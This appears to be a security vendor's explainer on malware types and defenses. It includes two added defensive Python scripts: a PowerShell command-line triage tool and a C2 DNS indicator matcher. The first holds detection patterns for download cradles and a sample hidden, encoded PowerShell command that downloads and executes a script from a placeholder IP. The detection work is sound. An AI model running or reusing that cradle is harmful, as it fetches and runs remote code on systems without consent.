Learning Center May 20, 2025 Reading Time: 5 minutes

What Is Malware? Common Types and How to Stop Them

What Is Malware?

Malicious software, or malware, is any code intentionally designed to infiltrate, disrupt, or damage systems, networks, or users. It operates without consent and often without visibility.

While malware has existed for decades, it remains a primary access vector and launchpad for breaches by cybercriminals and foreign intelligence services alike. Hardening your organization's own networks against malware may not be enough, however: according to SecurityScorecard research, attackers are increasingly delivering malware through vendors, cloud platforms, and supply chains to conduct their operations.

SecurityScorecard’s 2025 Global Third-Party Breach Report shows:

  • 16 of the top 25 threat actors in the past year were ransomware actors, including Cl0p, LockBit, RansomHub, BlackSuit, Akira, and Medusa
  • Ransomware—a kind of malware that encrypts its targets or locks users out of systems—came from third-party breaches 41.4% of the time in the past year

Why Malware Still Dominates

Despite advances in endpoint detection, malware continues to work in 2025 because:

  • It evolves faster than traditional defenses
  • Hackers can adapt it and tailor it to different targets
  • It’s now delivered through vendors and trusted systems
  • It combines access, espionage, and extortion in one toolset
  • Hackers can use obfuscation in their attacks to evade detection

Malware often travels stealthily, for example inside a software update or through a misconfigured file transfer tool.

7 Common Malware Types

SecurityScorecard tracks over 120 threat groups and surfaces infection information on over 150 malware families regularly through its sinkhole.

The STRIKE Team’s in-house malware information sharing platform (MISP) and threat sharing feeds provide a plethora of data to inform security programs and drive contextualized decision-making. SecurityScorecard’s malware attribution system includes over 1 million classified command-and-control IP addresses and over 350,000 classified malware samples.

Malware generally breaks down into a few distinct but frequently combined categories; one type is often used to deliver another:

1. Ransomware

Encrypts systems or data and demands payment for restoration. Modern ransomware variants and groups may also steal data, threaten leaks, or attack targeted organizations on multiple occasions.

Examples: Cl0p, LockBit, RansomHub
Defense: Segment networks, maintain offline backups, monitor for early signs of lateral movement.

2. Trojans

Disguised as legitimate software, trojans (named after the Trojan Horse of Greek legend) create hidden access points for attackers.

Examples: Emotet, TrickBot
Defense: Verify software sources, monitor traffic to known command-and-control (C2) IPs, use Endpoint Detection and Response (EDR) tools.

3. Spyware

Silently records user activity, capturing keystrokes, credentials, or screen data. Can be installed without user awareness.

Examples: Zeus, Red Shell
Defense: Restrict permissions, monitor browser and app behavior, provide anti-phishing training.

4. Adware

Injects unwanted ads or redirects browser activity. Attackers can also use it to install more serious threats.

Examples: Fireball, DollarRevenue
Defense: Block unauthorized browser extensions, enforce browsing security policies, and avoid visiting unsafe sites. Monitor for decreased system performance or new and unauthorized apps.

5. Worms

Self-replicating malware that spreads across systems without user input.

Examples: WannaCry, Conficker
Defense: Patch vulnerabilities, close unnecessary ports, limit cross-system access.

6. Rootkits

Embed deeply in system processes or firmware, granting persistent attacker access and control over victim devices.

Examples: Necurs, ZeroAccess
Defense: Monitor for low-level system changes, use integrity validation tools, restrict admin privileges.

7. Fileless Malware

Operates entirely in memory, often using legitimate system tools such as PowerShell.

Examples: Frodo, Number of the Beast
Defense: Disable unnecessary scripting, log command-line activity, deploy behavior-based detection.
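As an added example (not code from this page or from SecurityScorecard), the script below shows the "log command-line activity, deploy behavior-based detection" advice in practice: it decodes PowerShell -EncodedCommand payloads (base64 of UTF-16LE text) and scores each command line for download-cradle and in-memory-execution indicators, checking the decoded payload as well as the raw text so that encoding does not hide them. The log format, the indicator patterns, the weights and the sample log lines are assumptions constructed for illustration.

```python
"""Heuristic triage of process command lines for fileless PowerShell activity.

Added example, not SecurityScorecard code. Log shape, indicator patterns,
weights and sample lines are assumptions/constructed for illustration.
"""
import base64
import re
from typing import List, Optional, Tuple

# Each indicator: regex (matched against lowercased text) -> (label, weight).
# Weights are an illustrative choice, not a vendor scoring scheme.
INDICATORS = {
    r"-nop\b|-noprofile\b": ("profile suppressed", 1),
    r"-w(indowstyle)?\s+hidden": ("hidden window", 2),
    r"-ep\s+bypass|-executionpolicy\s+bypass": ("execution policy bypass", 2),
    r"\biex\b|invoke-expression": ("in-memory execution (IEX)", 3),
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient":
        ("download cradle", 3),
    r"frombase64string": ("inline base64 decode", 2),
    r"reflection\.assembly|\[system\.reflection": ("reflective assembly load", 3),
}

# -EncodedCommand and its short forms, followed by a base64 blob.
ENC_RE = re.compile(
    r"(?:-e|-ec|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/invalid.

    PowerShell encodes the script block as base64 of UTF-16LE text.
    """
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(cmdline: str) -> Tuple[int, List[str], Optional[str]]:
    """Score one command line; indicators are checked in the raw text and
    in the decoded payload so that encoding does not hide them."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline.lower() + ("\n" + decoded.lower() if decoded else "")
    score, reasons = 0, []
    if decoded is not None:
        score += 2
        reasons.append("encoded command")
    for pattern, (label, weight) in INDICATORS.items():
        if re.search(pattern, text):
            score += weight
            reasons.append(label)
    return score, reasons, decoded


def triage(log_lines: List[str], threshold: int = 5):
    """Return (score, reasons, cmdline) for lines scoring at/above threshold.

    Assumed log shape (constructed): '<timestamp> <user> <command line>'.
    """
    hits = []
    for line in log_lines:
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue
        score, reasons, _ = score_command_line(parts[2])
        if score >= threshold:
            hits.append((score, reasons, parts[2]))
    return hits


# Constructed sample: a benign admin command, a classic download cradle hidden
# behind -enc, and an unrelated process. 203.0.113.0/24 is a documentation range.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
    .encode("utf-16-le")
).decode()
SAMPLE_LOG = [
    "2025-05-20T10:01:02Z alice powershell.exe -NoProfile -Command Get-ChildItem C:\\Users",
    f"2025-05-20T10:02:15Z svc_backup powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}",
    "2025-05-20T10:03:44Z bob cmd.exe /c dir",
]

if __name__ == "__main__":
    for score, reasons, cmd in triage(SAMPLE_LOG):
        print(f"score={score} reasons={reasons}\n  {cmd[:80]}...")
```

The benign -NoProfile line scores below the threshold while the encoded download cradle scores well above it; in a real deployment the threshold and weights need tuning against the organization's own administrative tooling, which legitimately uses several of these flags.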

How Malware Reaches You: The Supply Chain Factor

Sophisticated threat actors rarely breach noisily. Their malware more often arrives through trusted channels: vendors, cloud platforms, and the software supply chain, as noted above. Third-party ecosystems now act as launchpads for malware delivery across industries.

How to Detect and Prevent Malware in 2025

1. Use Threat Intelligence for Context

Correlate malware samples and campaigns using real-world data. This can enable visibility into:

  • Which malware families are active
  • Which vendors or partners are compromised
  • Whether suspicious activity matches known threat actor tactics

SecurityScorecard maintains a network of honeypots and sinkholes that detect internet-based malware and allow SecurityScorecard to report malware issues, track malware signals from command-and-control infrastructure, and track threat actor behavior. SecurityScorecard also collects data on botnet activity. 

2. Monitor Command-and-Control Activity

C2 infrastructure is often reused across campaigns, so known indicators retain value. Watch for outbound connections to known C2 IP addresses and for DNS lookups of known C2 domains, including lookups that resolve to listed addresses.

SecurityScorecard collects over 2 billion DNS requests per day to identify early signals of compromise.
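The following is an added example, not SecurityScorecard code, of the C2 monitoring described in this section and in the trojan defense advice above ("monitor traffic to known C2 IPs"). It checks DNS log lines against an indicator list of IPs, networks and domains, matching both the queried name (including subdomains) and the resolved address, because C2 domains rotate while the IP space behind them is often reused, and vice versa. The indicator feed, the log format and the sample lines are constructed and use RFC 5737 documentation addresses; a real feed would be loaded from a MISP export or similar, but the matching logic is the same.

```python
"""Match DNS answers against a C2 indicator list (IPs, networks, domains).

Added example, not SecurityScorecard code. The indicator feed, the log
format and the sample log lines are constructed; real indicators would be
loaded from a MISP export or threat feed, but the matching is the same.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed indicator feed using RFC 5737 documentation addresses.
C2_IPS = {"198.51.100.23", "203.0.113.77"}
C2_NETWORKS = [ipaddress.ip_network("192.0.2.0/28")]  # a reused hosting block
C2_DOMAINS = {"update-cdn.example", "c2.bad.example"}  # subdomains also match


@dataclass
class Alert:
    ts: str
    client: str
    indicator: str
    kind: str      # "domain", "ip" or "net"
    detail: str


def match_domain(name: str) -> Optional[str]:
    """Return the listed domain that `name` equals or is a subdomain of."""
    labels = name.rstrip(".").lower().split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in C2_DOMAINS:
            return candidate
    return None


def match_ip(addr: str) -> Optional[Tuple[str, str]]:
    """Return (indicator, kind) if `addr` is a listed IP or inside a listed net."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:          # e.g. "NXDOMAIN" or a malformed field
        return None
    if str(ip) in C2_IPS:
        return str(ip), "ip"
    for net in C2_NETWORKS:
        if ip in net:
            return str(net), "net"
    return None


def scan_dns_log(lines: List[str]) -> List[Alert]:
    """Scan constructed DNS log lines of the form
    '<ts> <client> query=<name> answer=<ip or NXDOMAIN>'.

    Both the queried name and the resolved address are checked: C2 domains
    rotate, but the IP space behind them is often reused, and vice versa.
    """
    alerts = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, client = fields[0], fields[1]
        kv = dict(f.split("=", 1) for f in fields[2:] if "=" in f)
        name, answer = kv.get("query", ""), kv.get("answer", "")
        domain = match_domain(name)
        if domain:
            alerts.append(Alert(ts, client, domain, "domain", f"query {name}"))
            continue
        hit = match_ip(answer)
        if hit:
            alerts.append(Alert(ts, client, hit[0], hit[1], f"{name} -> {answer}"))
    return alerts


# Constructed sample log: one benign lookup, one listed domain (as a subdomain),
# one unlisted domain resolving into a listed network, an NXDOMAIN, and an
# address just outside the listed network.
SAMPLE_DNS = [
    "2025-05-20T09:00:01Z 10.0.0.15 query=www.example.com answer=198.51.100.200",
    "2025-05-20T09:00:07Z 10.0.0.15 query=cdn.update-cdn.example answer=198.51.100.23",
    "2025-05-20T09:01:30Z 10.0.0.42 query=files.partner.example answer=192.0.2.9",
    "2025-05-20T09:02:00Z 10.0.0.42 query=ghfdsjk.example answer=NXDOMAIN",
    "2025-05-20T09:03:12Z 10.0.0.77 query=mail.example answer=192.0.2.200",
]

if __name__ == "__main__":
    for a in scan_dns_log(SAMPLE_DNS):
        print(f"{a.ts} {a.client} {a.kind}:{a.indicator} ({a.detail})")
```

The third sample line is the case worth noting: the vendor-looking domain is not on the list, but the address it resolves to sits in a listed network, which is exactly what reused C2 infrastructure looks like from the DNS side. Sinkholed domains and known-good CDN ranges should be allowlisted before such alerts are routed to responders.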

3. Segment and Contain Early

Once malware lands, speed matters. Contain affected systems through:

  • Network segmentation
  • Access restrictions
  • Rapid threat isolation protocols

Containment efforts can prevent data theft, encryption, or lateral movement.

4. Audit Third-Party Access and Credentials

Attackers can deliver malware by using stolen or reused credentials, or by targeting third parties with weak security practices. Ask which vendors hold credentials or access into your environment, whether any of those credentials have been exposed, and how strong each vendor's own security practices are.

SecurityScorecard’s Supply Chain Detection and Response (SCDR) solution tracks vendor credential exposure, malware presence, and third- and fourth-party access risks.

What to Do After Malware Is Detected

  • Isolate the system immediately
  • Preserve logs, memory dumps, and forensic artifacts
  • Notify legal, security, and affected partners
  • Investigate scope, including third-party involvement
  • Remove malware and patch exploited vulnerabilities
  • Document and update playbooks for future response

If a vendor was the source, activate your third-party breach protocol.

Protect Your Supply Chain with Real-Time Threat Detection
SecurityScorecard’s SCDR solution offers continuous monitoring of your third-party ecosystem, enabling swift identification and mitigation of cyber threats. Enhance your organization’s resilience by proactively managing supply chain risks.